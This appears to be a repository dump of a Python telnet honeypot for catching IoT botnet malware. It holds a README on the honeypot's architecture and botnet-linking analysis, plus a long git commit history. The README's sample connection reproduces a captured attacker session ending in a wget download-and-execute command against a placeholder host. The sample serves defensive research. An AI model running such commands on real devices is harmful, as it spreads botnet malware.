======================: FILES :======================
======================: README CONTENT :======================
## Disclaimer

This project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! 

# Telnet IoT honeypot

'Python telnet honeypot for catching botnet binaries'

This project implements a python telnet server trying to act
as a honeypot for IoT Malware which spreads over horribly
insecure default passwords on telnet servers on the internet.

The honeypot works by emulating a shell enviroment, just like 
cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse
Botnet connections and "map" Botnets by linking diffrent
connections and even Networks together.

## Architecture

The application has a client/server architecture,
with a client (the actual honeypot) accepting telnet connections
and a server which receives information about connections and
does the analysis.

The backend server exposes a HTTP interface which is used
to access to frontend as well as by the clients to push new
Connection information to the backend.

## Automatic analysis

The Backend uses 2 diffrent mechanisms to automatically link
connections:

### Networks

Networks are discovered Botnets. A network is the set of all linked
connections, urls and samples. Urls and samples
are linked when they are used in a connection. Two connections are linked
when both connections are recieved by the same honeypot client
(mutliple clients are supported!) and use the same credentials in a short
period of time (defautl 2 minutes) or come from the same IP address.

### Malware

Multiple networks are identified to use the same type of malware
if the text entered during sessions of the networks aro mostly the
same. This comparison is done using sort of "hash"-function which
basically translates a session (or connection) into a sequence
of words and then maps each word to a single byte so this resulting
sequence of bytes can be easily searched.

# Running

The application has a config file named config.py.
Samples are included for local and client/server deployments.

## Configuration

The backend requires a SQL-database (default sqlite) which is initialized
at first run. Before the first run you should generate a admin account
which is used to generate more users. The admin account can also directly
used by a client to post connections. When more than one honeypots shall be
connected, creating multiple users is recommended.

	bash create_config.sh

Both client and backend will read the files `config.yaml` and `config.dist.yaml`
to read configuration parameters. The `config.dist.yaml` file includes
default values for all but admin user credentials and these parameters
are overwirtten by entries in the `config.yaml` file.

## Running the Server

	python backend.py

## Running the Client

This project contains an own honeypot, however because of the client-server architecture,
other honeypot can be used as well.

### Using the built-in honeypot

	python honeypot.py

The client cannot be started without the server running. To use a diffrent configuration
for the client you can use the `-c` switch like this:

	python honeypot.py -c myconfig.yaml

If you only want to check the honeypot functionality,
you can start the client in interactive mode:

	python honeypot shell

### Using cowrie

I wrote an output plugin for cowrie, which has much more features than the built in honeypot.
If you want to use cowrie instead, checkout my fork which includes the output module here:
https://github.com/Phype/cowrie .

## Opening the frontend

After the server is started, open `http://127.0.0.1/` in your favorite browser.

## Sample Connection

	enable
	shell
	sh
	cat /proc/mounts; /bin/busybox PEGOK
	cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
	nc; wget; /bin/busybox PEGOK
	(dd bs=52 count=1 if=.s || cat .s)
	/bin/busybox PEGOK
	rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

## Images

![Screenshot 1](images/screen1.png)

![Screenshot 2](images/screen2.png)

![Screenshot 3](images/screen3.png)
====================== GIT HISTORY: ======================
5d32829 HEAD@{0}: clone: from https://github.com/Phype/telnet-iot-honeypot
commit 5d32829a36b5bcd369e47d9225f7a88dfdcfe490
Author: Philipp Jeitner <3951813+Phype@users.noreply.github.com>
Date:   Thu Apr 21 11:47:01 2022 +0300

    Update README.md

commit a733bfe601cd2802f0b85c8771f1dff497ddafd7
Author: Philipp Jeitner <3951813+Phype@users.noreply.github.com>
Date:   Thu Apr 21 11:46:25 2022 +0300

    Update README.md
    
    Add deprecation notice.

commit f1d4b75245d72990d339668f37a1670fc85c0c9b
Merge: 986ec09 a7c5452
Author: Phype <phypemobile@gmail.com>
Date:   Wed Mar 10 12:07:46 2021 +0100

    Merge pull request #30 from armanirodriguez/master
    
    Fixed backend crashing

commit a7c5452a1e084965aca121c47acf2baadd0a59a6
Author: armanirodriguez <armanilrodriguez@gmail.com>
Date:   Tue Mar 9 16:05:26 2021 -0500

    added threading to flask server

commit 986ec09933b90db55dcb76f20572f2dd27a72790
Merge: 4b68129 aef823f
Author: Phype <phypemobile@gmail.com>
Date:   Wed Jul 22 13:44:30 2020 +0200

    Merge pull request #29 from verovaleros/master
    
    Update connection.html to fix typo

commit aef823f20c4d88cf3986d53ab620dc1d67ba12bb
Merge: 4b68129 d909c9e
Author: Veronica Valeros <vero.valeros@gmail.com>
Date:   Sat Jul 18 19:14:40 2020 +0200

    Merge pull request #1 from verovaleros/verovaleros-patch-1
    
    Update connection.html to fix typo

commit d909c9e78a066e392a8e14bec3e992342cf4ba64
Author: Veronica Valeros <vero.valeros@gmail.com>
Date:   Sat Jul 18 19:13:59 2020 +0200

    Update connection.html
    
    Fixed typo in line 54 ( > gathered)

commit 4b68129d1440d7a81c80de865175c8d8afa31e74
Merge: 22fba98 fbd4d63
Author: Phype <phypemobile@gmail.com>
Date:   Tue Oct 29 15:06:46 2019 +0100

    Merge pull request #26 from xermicus/add-docker-deployment
    
    add Dockerfile and setup script for docker-compose

commit fbd4d630d18220132a749c22aef1541c2b555afe
Author: xermicus <bigcyrill@hotmail.com>
Date:   Thu Oct 3 09:54:39 2019 +0200

    add Dockerfile and setup script for docker-compose

commit 22fba98d03cb8b517180e58ee372ef5a69a96ae4
Merge: d423784 ed1843e
Author: Phype <phypemobile@gmail.com>
Date:   Wed Sep 4 14:49:13 2019 +0200

    Merge pull request #25 from Cih2001/master
    
    Bug fix

commit ed1843ea9df2d4ac8cd11051c429e7b21c371b22
Author: Hamidreza Ebtehaj <hamidreza.ebtehaj@gmail.com>
Date:   Fri Aug 9 16:24:46 2019 +0200

    Fixed a bug that causes an endless loop when we continue without adding pos.

commit d423784e848682766a1fc9e465683d8721ab7a23
Author: Phype <you@example.com>
Date:   Sat Apr 20 08:02:37 2019 -0400

    some fixes for testing

commit 55171c891fec3c3a21d6cbe51c2d4d70bc07bf29
Author: Phype <you@example.com>
Date:   Fri Apr 19 13:06:50 2019 -0400

    Fix frontent when behind an https proxy

commit e84ec3f9265d640244f6d84a23df19d3bb18123f
Author: Your Name <you@example.com>
Date:   Fri Apr 19 13:02:03 2019 -0400

    Fix error on push without login (happens only with cowrie)

commit 9dcc48068a00cef37bff20219b873e681a2d8181
Merge: 0c489dc c9901d7
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 9 18:27:47 2019 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit 0c489dc5d18ff4dbf906753da22d7ff7429e3922
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 9 18:27:04 2019 +0100

    Make ugly hack even uglier :S

commit c9901d7aad998bec8419ada12494bdb168e6d317
Author: Phype <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Sat Mar 9 16:47:00 2019 +0100

    Update README.md

commit edd4cf918f5326a282320b0db6363b363fc36bce
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:57:37 2019 +0100

    Fix dependencies for eventlet (maybe?!)

commit 1a5b4d785bb6fe0c24e5fc3dd2300346e94064aa
Author: Phype <p.jeitner@gmail.com>
Date:   Fri Mar 8 17:56:35 2019 +0000

    Exception debugging

commit 09c7993b0eafa621b5409e6014035542c49bbf9b
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:40:11 2019 +0100

    try to fix sqlite with slow machines

commit ef73755e81724ef39d66d5058c1353baa0475ab9
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:05:18 2019 +0100

    Fix issue #19

commit 35d24aa6d614214513c8c7405d712f6bf7fb7108
Author: Phype <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Tue Mar 5 23:20:28 2019 +0100

    Delete TODO.md

commit 002c6dfbd2833401b1c478eae3420e475bcc2c72
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Tue Mar 5 22:36:12 2019 +0100

    updated github, many new features!

commit 6720ca750555a392296ee34290c70e6ec6375e1c
Merge: cf43e46 47cff9d
Author: Phype <phypemobile@gmail.com>
Date:   Tue Mar 5 21:37:11 2019 +0100

    Merge pull request #16 from ameygat/patch-1
    
    Change for Removing Error local variable _BACKEND referenced before a…

commit 47cff9d1a15f8d97264683a1400d767901806489
Author: Amey Gat <ameygat@users.noreply.github.com>
Date:   Fri Apr 20 18:30:28 2018 +0530

    Change for Removing Error local variable _BACKEND referenced before assignment
    
    Normal Execution Getting Error:
    ```
      File "/home/a/honeypots/telnet-iot-honeypot/honeypot/sampledb_client.py", line 14, in get_backend
        if _BACKEND:
    UnboundLocalError: local variable '_BACKEND' referenced before assignment
    ```
    So this Fix.

commit cf43e469ff86e0cb102a5eea4d9eef1dfb1ab6f2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 12 21:07:26 2018 +0100

    remove func

commit ff77f18446e9b21429c08763dd45c631aa109f55
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Jan 11 17:20:37 2018 +0100

    cleanup

commit 00c3615ef73639d4f1d626916fe1b97c04204384
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 7 03:57:00 2018 +0100

    Rework honeypot shell struture. Add TFTP support

commit 6eb46876c71c8af2ef7a9a92525d52d7a9f0541b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 20:52:02 2018 +0100

    TFTP test

commit 0ae07cff31c84b0563bb6cd997992f053d140e40
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 07:14:31 2018 +0100

    Fix timeout

commit 2bfb3aed5c07259393ab5f0c2229bc0bfc73a528
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 07:11:43 2018 +0100

    Add timeout

commit da7a5a7d0940a218f75973867174d8bae0fc6ba7
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:58:07 2018 +0100

    Parse Hajime stub downloader, dl real stage2 binary

commit fd6701ff3aedb8426a8d665c69f41a85c25baf55
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:25:03 2018 +0100

    Write-up of mirai/hajime commands used

commit 5d22d852e951018044ac4a82b19bb1576da41180
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:24:39 2018 +0100

    Fix case when url lookup does ignore asn resolution config

commit 592d245f526e519afd3e46ca8e3b251ee2edbdd1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:44:33 2018 +0100

    Fix redirect from [only parsing]

commit ed32f8f905c07bb126b2d3990d54a34ef6f1a86a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:37:00 2018 +0100

    Add fancy graph for connhash analysis, option to disable ASN lookup

commit 8426c2c42ca1d7f68b01e67fba4190c1e3521cf6
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:35:45 2018 +0100

    Fix trailing whitespace with redirects

commit 983394a9fb894c6d3554ba26f40570d5c959e8b4
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 31 07:14:56 2017 +0100

    Fix backend error when connections includes same url twice

commit 048e2471649a7e4e4c64925ec48f357a70fca28e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 31 07:14:26 2017 +0100

    Change wget help screen to busybox one

commit 632e9a593a5749ad03e443760db8ed08b99aeb07
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:17:52 2017 +0100

    Update installation instructions

commit c911f1c6b85768e9c69990e44a024a186138d4be
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:00:43 2017 +0100

    Update requirements

commit af75e963d5da7c0528191f1c962f553cc6c81811
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:00:10 2017 +0100

    Serve static files for development

commit c7961943af31bf581b795971f34b12a9137b3d71
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:41:05 2017 +0100

    Ability to re-run a logfile

commit bdd23fe93f87bf843093f40688863be31fba0094
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:26:54 2017 +0100

    Detect deleted files as samples

commit 0676e2633413c9b75635d4883e61c2e4bb7d5701
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:22:55 2017 +0100

    Fix appending redirect

commit 5d262bc37281e5d4ae24ea61d3aee6a0a504c799
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 06:41:16 2017 +0100

    log ignored files

commit bc8b8c462b849d3950e30fe2e9baea943517ef3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 06:28:46 2017 +0100

    Fix broken redirects

commit a6875df93e386376646889ea776b2fa40b468428
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 05:02:51 2017 +0100

    Make it posible to run the honeypot standalone, logging to file only

commit 3215a97bf8f777257957ba20fb1ee79996f24d97
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 04:55:57 2017 +0100

    Switch representation of session text from string to event stream

commit 2dffa0536c1df4dfbbc01df1af3382c004701e44
Merge: 932bb09 b0cbc33
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 20 23:26:13 2017 +0100

    Merge branch 'master' of github.com:phype/telnet-iot-honeypot

commit 932bb090e21c2fe8e21cd5e3e0407e707e812f16
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 20 23:26:02 2017 +0100

    Add vagrant config

commit b0cbc331bfe3324f3ced676d15abf957944a8d94
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 07:03:31 2017 +0100

    Dont output anything when wget switch -O is used

commit 40406f4131e6c692e3efcb4af09627ef737ba7ee
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 06:54:36 2017 +0100

    Add virustototal update switch

commit 3cf5199dbbb0838862d9b87a9bdb03110fc7de3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 06:05:45 2017 +0100

    Fix length of users.password to 64 chars ...

commit ca6704e4639556a8e9f987daf656a2ca55f9926d
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:58:44 2017 +0100

    Fix wrong requirement name

commit f39c64bbc2f5be71c4cb73a200e8bbbaceefecfc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:50:39 2017 +0100

    Add chart.js animation on mobile devices

commit db528af929366d2684818e16fe171c60da6318fc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:38:38 2017 +0100

    Remove use_local_db option, it breaks to much internal structure

commit f5ffee9907c5c2c9df85d51ba3c59540dd5d2b26
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:25:11 2017 +0100

    Add basic admin menu

commit 68147ff7e5f7b811006944bf4cd7f44ab851faf3
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 04:34:38 2017 +0100

    Add users table, full multi-user support

commit 57186b0a62538634c42ab3c77ad766b60d3b4d21
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 02:57:02 2017 +0100

    Change configuration file format

commit c635a3054a3db4acc91549cd394c813c9a11abcc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 02:09:06 2017 +0100

    Add basic single-user backend authentification

commit 2a7c5e77c9113eccb790a8ced38d6f0c5ebdb7f0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 14:21:14 2017 +0100

    Fix && operator

commit d0d8f6541701675715bf786f86dbea1d5869df08
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:46:45 2017 +0100

    Delete unused method

commit 53ed295dbdd69240f3fce18987d17a0ecdc4cac2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:46:14 2017 +0100

    Fast connection fetch for graph

commit 28b54596f6e4346b69a8b885dcb764b334a15b89
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:43:37 2017 +0100

    forgot

commit 8ef90cd376b33f4913f14488b0283bd3106c1c11
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:42:31 2017 +0100

    Forntend update

commit ae3fd9b85b6b0f64e52f7d627819e0a5d89327a6
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 07:54:53 2017 +0100

    Save associates in db for better analyssi

commit 208467450c97c142cca7ce5aab14ecbbf748c48f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 06:44:38 2017 +0100

    Allow trailing ;

commit 01fb8cd9393f63c9ff966a59ec6b448258078454
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 05:27:56 2017 +0100

    Minimum filesize 128 bytes

commit 136fc5b6ef5c92e9bd3e5770dcb00443b29dbe28
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 05:23:43 2017 +0100

    Rework session - backend comm

commit 3624c662d1455df766d4f9e1e360ba7e4618f40c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:33:34 2017 +0100

    Improve dd, add /proc/cpuinfo

commit 757a5c200fb915706415c0379d4e0464df6c2d30
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:24:41 2017 +0100

    Add cp

commit 8baaa9f3252a87907a9a33ec5e2f0835dc795a27
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:15:44 2017 +0100

    Some adjustments

commit 08c747a5f2e745c7d117767fdfdb9c89498fb667
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:41:04 2017 +0100

    Fix conditional execution

commit 1aeba4d93217cf574188d847620eff0f3a4905b0
Merge: b84c7a3 4e040a2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:17:38 2017 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit b84c7a38155f7f18f41b628d72158b73f76a2e16
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:17:23 2017 +0100

    Introduce context-free semi-shell grammar w/execution env

commit 4e040a25ed11947da58e735e02a16cfccfb1eb74
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 11 04:02:46 2017 +0100

    Threat concurrent connections from same ip as associates

commit 7966bd26363174fee22db3ed06538048707d838a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 08:00:13 2017 +0100

    Token is now fallback output only

commit 458a7be947d697bcef24c2f92594d62e797ef42f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:54:11 2017 +0100

    Fix wrong wget output

commit b365418b21794e01ec01de2816bb260bd2c71fa9
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:46:59 2017 +0100

    Fix shell banner popping up everytime

commit a2abce530677903c54925fb8e09ffa4aa2ca0f88
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:43:21 2017 +0100

    Split commands by ;

commit 7a2d47b4131247fb25b9e08f09bf9338cdb0a5c1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:34:47 2017 +0100

    Command fixes

commit c7fcaf060c2cd8481481c32866468baf43342369
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:27:31 2017 +0100

    Fix broken token regex

commit 2eb91be65610e2cf227270b3c1ae452a60d56788
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:24:32 2017 +0100

    fix

commit c92213cdd0f9408916fefe089268bc846e057e52
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:22:34 2017 +0100

    Support echo -ne, change port to 2223

commit 5a7f8d129e222db970914cebf47f4ff9685da4d0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 01:28:20 2017 +0100

    Improve graph

commit 93c9ec04e7bf2e357da093fa98199185a89f663e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 01:05:17 2017 +0100

    Reduce db lookup depth, add urls and samples to experimantal graph

commit 6e55162811b66c2cccd80b4ead60eebb6324b4c1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 23:59:24 2017 +0100

    Add exerimental neighbor graph drawing site

commit 195e4e5693b4eda45b7c04f6deeb0752030bd3da
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:43:03 2017 +0100

    Add tooltip

commit 0d2bbf495f18e9d2a19e571125b8278eb2b59ae0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:26:50 2017 +0100

    cleanup

commit 3886dae1eeb53439e265b6f7739de6359b7d7658
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:25:41 2017 +0100

    Set default db to sqlite to help with initial setup

commit 29e19e900ecaead38059878b2058123190a2afe3
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:10:36 2017 +0100

    Added new dependency simpleeval

commit e593d45e05081065c2f62268748b93f2f9146de4
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:02:04 2017 +0100

    Some sample tags

commit a231cefb1a98fba683a4482825f801837e324271
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:01:26 2017 +0100

    Add support for Tags

commit 1a7243243cef46c339b89374ae5676ed58e5c2ee
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 17:05:33 2017 +0100

    Re-started http://phype.pythonanywhere.com/

commit de04c6d6d2974d995f99dc0c46489f9a473fa843
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:56:12 2017 +0100

    Update INSTALL.md

commit ae7e386221c77178758ab2488e9c5a9e5b6509fe
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:50:11 2017 +0100

    Update INSTALL.md

commit 451fbc96b59644c3080274eddc90b531cbcfbe15
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:45:22 2017 +0100

    Update INSTALL.md

commit c28e6617492b8c4f69d7c4c517e65585134c067b
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:38:53 2017 +0100

    Update INSTALL.md

commit 87353cc5525b0d789f89c270d1be10c39d91aa9b
Merge: ff79000 3d36fdf
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:18:01 2017 +0100

    Merge pull request #8 from doomedraven/master
    
    update cuckoo module to reflect api changes

commit 3d36fdf2aa12f1324bacc67013db5362c686f10e
Author: doomedraven <doommedraven@gmail.com>
Date:   Mon Nov 13 19:43:29 2017 +0100

    better check

commit a7312369fd84c11e51f1e05fb3252c02c7e8cd45
Author: doomedraven <doommedraven@gmail.com>
Date:   Mon Nov 13 19:39:02 2017 +0100

    update cuckoo module to reflect api changes
    
    and disable warnings

commit ff7900074cd982003af50f7eda0883c7e05798f1
Author: Phype <phypemobile@gmail.com>
Date:   Mon Nov 13 18:37:54 2017 +0100

    Correct horribly awful spelling mistake

commit 07a7e2519b45e109d75f3811480d00c6a57bafdf
Merge: 15343df 1c0338b
Author: Phype <phypemobile@gmail.com>
Date:   Mon Nov 13 18:18:45 2017 +0100

    Merge pull request #4 from doomedraven/master
    
    fixed/improvements

commit 1c0338b9e5f30dba80137e46e87282a0a0f6052f
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 14:28:03 2017 +0100

    fix

commit ceb2c94829ca7179a24c5b8e725e824b252c4e2f
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 14:25:55 2017 +0100

    upload to vt

commit 166939dcce5589eebc5368f98cab625914072a7a
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 11:32:31 2017 +0100

    remove object from cuckoo class

commit 85944458ec9f745a16efc620242153909c6bd214
Author: doomedraven <doommedraven@gmail.com>
Date:   Fri Nov 3 20:10:35 2017 +0100

    fixed/improvements
    
    1 - create folder automatically if not exists
    2 - cuckoo integration(example linux.huntingmalware.com)
    3 - debug False by default
    4 - instalation documented
    5 - added urls/samples tab/template

commit 15343df9d51511e27abeaef6a0d7ae3a0a20c8af
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed May 24 01:45:52 2017 +0200

    Standard apiurl.js, TODO, README

commit 4dd567e52ff15006a6c4b58390875115a92433ce
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed May 24 01:35:29 2017 +0200

    New Screenshots

commit b76b5a0f75a6f7e88d27b9b34be06c0f993a6612
Merge: 3ac7aa4 a9e0c59
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon May 22 05:05:23 2017 +0200

    Merge branch 'master' into client-server

commit 3ac7aa4f9bb31bbca3b81acf48154d09524fb4ed
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 03:25:15 2017 +0200

    Frontend goodies

commit 439ec1b539c288f55532a2b504dfd7d1ef34c3ed
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:59:17 2017 +0200

    typo latnic -> lacnic

commit 97b72c873167ef12426e6995f4d994616fd5a45c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:57:10 2017 +0200

    Add EU to country list (example.com)

commit 7cafb8d9c9aca9951e889553c984cfcd65ddfa5d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:51:16 2017 +0200

    Automatically get ASN Info

commit 91022f50fe4d073c4669070bfb427a896ec7098f
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:26:59 2017 +0200

    Add ASN Info to db, ASN Info page

commit b19f1eb9ecff409b59934945e7b13f5fa2064360
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Apr 19 23:54:09 2017 +0200

    forgot to change pass to password in overview

commit cd7f7abbfcb75be4c22dc45290be3940e5ec7446
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Apr 19 23:52:36 2017 +0200

    More detailed filtering mechanism

commit f4fa311dc59ba6127394424b5c547e1af9698ca4
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Apr 18 19:46:21 2017 +0200

    Add connectiong association, add conection list with filtering for ip,country

commit da18d6c44f96e861ddb58e8e9de835b178e2328a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:54:29 2017 +0200

    cat busybox, frontend improvements

commit ad8e35dfae29ae7eb6f28890346dfd9105fa72e6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:29:22 2017 +0200

    Basic VT integration

commit 2d8294908427b93b8fd6f514db3e115fba94107f
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:02:13 2017 +0200

    Activate new index file

commit dd5adbccb10c771dae52e41048d97dc5b589b7b5
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:00:28 2017 +0200

    Add URL IP,ASN etc to Frontend

commit 1dab84cefaf4e6d145e20783bf321fba157531a9
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 19:47:17 2017 +0200

    Add DB conversion for commit 9a28ce90

commit 9a28ce90476c5ed175ef5cf6250d933ea2a5bc6d
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 19:39:26 2017 +0200

    fdssdf

commit e380901c2278ffdc800db35928c218edb8f0e49f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 18:33:44 2017 +0200

    Add country flags

commit 79fdea97aab98c778915ef1e86fbb92eb2ae57a2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 18:07:42 2017 +0200

    Add Country Names

commit 3806298ec8370b7ff9071d5019261b7fb18344fd
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 16:50:25 2017 +0200

    forgot :

commit 409992fd586010353193c4a9cf7751aebdaa7131
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 16:49:18 2017 +0200

    Drop check_same_thread arg for non-sqlite conns

commit 984a237929b2ef32fd0966a7e4b4b756af7ffa46
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 15:49:14 2017 +0200

    Remove swap file

commit 29142c6ef403374f02ad8cf26b6edb70c9a10c77
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 15:48:19 2017 +0200

    Stats

commit a90ed40b1b48f1b519aeced90731556a410bc1a2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:37:54 2017 +0200

    Show AS Info

commit 1322efd95dbaa296e60629dd26914558b59b8516
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:35:48 2017 +0200

    Ignore Bad Ascii Chars in Session text to prevetn failing uploads

commit 84cb41141086482fc20068b9431ca3f91723d010
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:09:53 2017 +0200

    IP Info, Frontend

commit 2fd2e39118d20e03f0710f6a097f54e99145dc6b
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 15:59:36 2017 +0200

    Overview view etc.

commit 340bcf39f9918cbc91c785a38a766a4354285131
Author: Phlipp Jeitner <p.jeitner@gmail.com>
